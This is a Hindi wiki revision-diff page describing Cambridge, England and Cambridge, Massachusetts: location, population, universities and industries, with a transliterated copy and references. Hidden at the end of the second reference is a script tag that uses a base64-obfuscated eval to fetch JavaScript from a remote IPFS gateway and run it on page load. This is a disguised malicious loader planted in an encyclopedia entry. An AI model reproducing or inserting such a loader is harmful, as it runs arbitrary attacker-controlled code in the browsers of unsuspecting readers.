Difference between revisions of "कैम्ब्रिज"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
Line 1: Line 1:
'''कैम्ब्रिज''' इंग्लैंड का एक नगर जो केम (Cam) नदी के दाहिने तट पर लंदन के उत्तरपूर्व 50 मील की दूरी पर स्थित है। इसका विकास एक दुर्ग के चारों ओर हुआ है। नगर का क्षेत्रफल 10,060 एकड़ तथा जनसंख्या 1,00,200 (1969) है। यहाँ प्राचीन काल से अनेक मेले लगते आए हैं, अब भी वार्नवेल का ग्रीष्मकालीन मेला प्रत्येक वर्ष 22 जून को आरंभ होता है। विद्या के केंद्र के रूप में यहाँ केंब्रिज विश्वविद्यालय तथा गिल्ड हॉल लायब्रेरी हैं। यहाँ रेडियो, टेलिविजन, वैज्ञानिक यंत्र, सीमेंट, पीतल एवं लोहे की ढलाई के उद्योग हैं।  
+
'''कैम्ब्रिज''' [[इंग्लैंड]] का एक नगर जो '''केम (Cam) नदी''' के दाहिने तट पर [[लंदन]] के उत्तर पूर्व 50 मील की दूरी पर स्थित है। इसका विकास एक [[दुर्ग]] के चारों ओर हुआ है। नगर का क्षेत्रफल 10,060 एकड़ तथा जनसंख्या 1,00,200 (1969) है। यहाँ प्राचीन काल से अनेक मेले लगते आए हैं, अब भी वार्नवेल का ग्रीष्मकालीन मेला प्रत्येक वर्ष [[22 जून]] को आरंभ होता है। विद्या के केंद्र के रूप में यहाँ '''कैम्ब्रिज विश्वविद्यालय''' तथा '''गिल्ड हॉल लायब्रेरी''' हैं। यहाँ रेडियो, [[टेलिविजन]], वैज्ञानिक यंत्र, सीमेंट, [[पीतल]] एवं [[लोहा|लोहे]] की ढलाई के उद्योग हैं।  
 
+
==अमेरिका==
संयुक्त राज्य अमरीका के मेसाचुसेट्स राज्य का एक नगर जो चार्ल्स नदी के बाएँ तट पर बोस्टन से 5 मील उत्तरपश्चिम स्थित है (स्थित 42 18 उ. अ. से 714 पू. दे.)। यहाँ सुप्रसिद्ध हार्वर्ड विश्वविद्यालय है जिसकी स्थापना 1636 ई. में हुई थी। इसकी जनसंख्या 1,07,716 (1960) है। इसकी ख्याति मुद्रण एवं प्रकाशन के लिये है। केंब्रिज में रसायन, तार, बिजली तथा काँच के सामान का निर्माण किया जाता है।<ref>{{cite web |url=http://www.bharatkhoj.org/india/%E0%A4%95%E0%A5%88%E0%A4%AE%E0%A5%8D%E0%A4%AC%E0%A5%8D%E0%A4%B0%E0%A4%BF%E0%A4%9C |title=कैम्ब्रिज |accessmonthday=07 अगस्त |accessyear=2018 |last= |first= |authorlink= |format= |publisher=भारतखोज |language=हिंदी }}</ref>  
+
[[संयुक्त राज्य अमरीका]] के मेसाचुसेट्स राज्य का एक नगर जो '''चार्ल्स नदी''' के बाएँ तट पर बोस्टन से 5 मील उत्तर पश्चिम स्थित है।<ref>स्थित 42 18 उ. अ. से 714 पू. दे.</ref> यहाँ सुप्रसिद्ध '''हार्वर्ड विश्वविद्यालय''' है जिसकी स्थापना 1636 ई. में हुई थी। इसकी जनसंख्या 1,07,716 (1960) है। इसकी ख्याति '''मुद्रण एवं प्रकाशन''' के लिये है। केंब्रिज में रसायन, तार, बिजली तथा काँच के सामान का निर्माण किया जाता है।<ref>{{cite web |url=http://www.bharatkhoj.org/india/%E0%A4%95%E0%A5%88%E0%A4%AE%E0%A5%8D%E0%A4%AC%E0%A5%8D%E0%A4%B0%E0%A4%BF%E0%A4%9C |title=कैम्ब्रिज |accessmonthday=07 अगस्त |accessyear=2018 |last= |first= |authorlink= |format= |publisher=भारतखोज |language=हिंदी }}</ref>  
  
  

Revision as of 07:01, 13 January 2020

kaimbrij ianglaiand ka ek nagar jo kem (Cam) nadi ke dahine tat par landan ke uttar poorv 50 mil ki doori par sthit hai. isaka vikas ek durg ke charoan or hua hai. nagar ka kshetraphal 10,060 ek d tatha janasankhya 1,00,200 (1969) hai. yahaan prachin kal se anek mele lagate ae haian, ab bhi varnavel ka grishmakalin mela pratyek varsh 22 joon ko aranbh hota hai. vidya ke keandr ke roop mean yahaan kaimbrij vishvavidyalay tatha gild h aaul layabreri haian. yahaan rediyo, telivijan, vaijnanik yantr, simeant, pital evan lohe ki dhalaee ke udyog haian.

amerika

sanyukt rajy amarika ke mesachusets rajy ka ek nagar jo charls nadi ke baean tat par bostan se 5 mil uttar pashchim sthit hai.[1] yahaan suprasiddh harvard vishvavidyalay hai jisaki sthapana 1636 ee. mean huee thi. isaki janasankhya 1,07,716 (1960) hai. isaki khyati mudran evan prakashan ke liye hai. keanbrij mean rasayan, tar, bijali tatha kaanch ke saman ka nirman kiya jata hai.[2]


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

  1. sthit 42 18 u. a. se 714 poo. de.
  2. kaimbrij (hiandi) bharatakhoj. abhigaman tithi: 07 agast, 2018.<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

sanbandhit lekh